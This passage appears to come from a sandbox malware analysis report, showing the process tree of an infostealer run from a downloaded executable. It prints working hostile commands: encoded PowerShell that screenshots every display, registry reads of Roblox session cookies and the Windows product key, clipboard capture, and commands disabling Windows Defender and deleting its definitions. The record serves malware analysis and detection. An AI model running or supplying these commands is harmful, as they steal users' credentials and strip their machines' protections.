gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2360
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵PID:1932
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x414z3wr\x414z3wr.cmdline"5⤵PID:3516
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F18.tmp" "c:\Users\Admin\AppData\Local\Temp\x414z3wr\CSCED446ED9AA6B44B280F138CFE814CDC.TMP"6⤵PID:1960
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2760
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:656
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2616
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5108
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:7104
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:7052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
PID:6204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:6356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:6884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:1716
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:2044
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5440
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:228
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:6208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:6140
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:6036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:3108
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6952
-
C:\Users\Admin\Downloads\pi5.tmp.exe"C:\Users\Admin\Downloads\pi5.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6488 -
C:\Users\Admin\AppData\Local\Temp\onefile_6488_133779369635176755\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exeC:\Users\Admin\Downloads\pi5.tmp.exe2⤵
- Executes dropped EXE
PID:6584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:6756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:3716
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5920
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5428
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:6276
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5440
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:876
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:5924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:6620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:6544
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6436
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:7000
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:6652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgA